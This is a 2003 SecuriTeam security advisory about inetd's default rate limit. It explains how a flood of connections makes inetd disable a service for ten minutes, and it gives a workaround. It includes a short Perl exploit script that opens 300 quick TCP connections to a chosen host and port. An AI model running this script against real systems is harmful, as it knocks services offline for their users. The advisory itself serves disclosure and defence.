[UNIX] Default Configuration of InetD Allows Attackers to Initiate a DoS

• Previous message: SecuriTeam: "[EXPL] Exploit Code Released for WordPerfect Converter Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 7 Sep 2003 10:55:06 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Default Configuration of InetD Allows Attackers to Initiate a DoS
------------------------------------------------------------------------

SUMMARY

Due to the default configuration of InetD (Internet Services Daemon) it is
possible for a remote attacker to initiate a denial of service attack
against one of its hosted services. The attack is very easy to initiate,
and requires only a limited amount of bandwidth (The issue was first
reported in:
<http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html>
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html, about 11
years ago).

DETAILS

InetD has an option
     -R rate

  Specify the maximum number of times a service can be invoked in
  one minute; the default is 256. A rate of 0 allows an unlimited
  number of invocations.

The problem is, remote attacker can establish as much connections per
minute as bandwidth allows. How InetD reacts if more than 256 connections
received in one minute? It will disable service for next 10 minutes to
help attack to succeed. Of course, this is documented. Note that the
interval is not configurable.

In the log file something like will appear:
Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service
terminated

If connection is closed by attacker before service actually starts, the IP
address of attacker will never be logged.

Workaround:
Add to your inetd.conf file the following line:
-R 0 -s your_ad_can_be_here

Exploit:
#!/usr/bin/perl

use Socket;
$host=@ARGV[0];
$port=@ARGV[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
$iadr=inet_aton($host); $padr=sockaddr_in($port,$iadr); for($i=0; $i <
300; $i++) { socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
 connect(SOCK,$padr) or next;
 close(SOCK);
}
print "\nDone\n";

ADDITIONAL INFORMATION

The information has been provided by <mailto:3APA3A@SECURITY.NNOV.RU>
3APA3A.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] Exploit Code Released for WordPerfect Converter Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]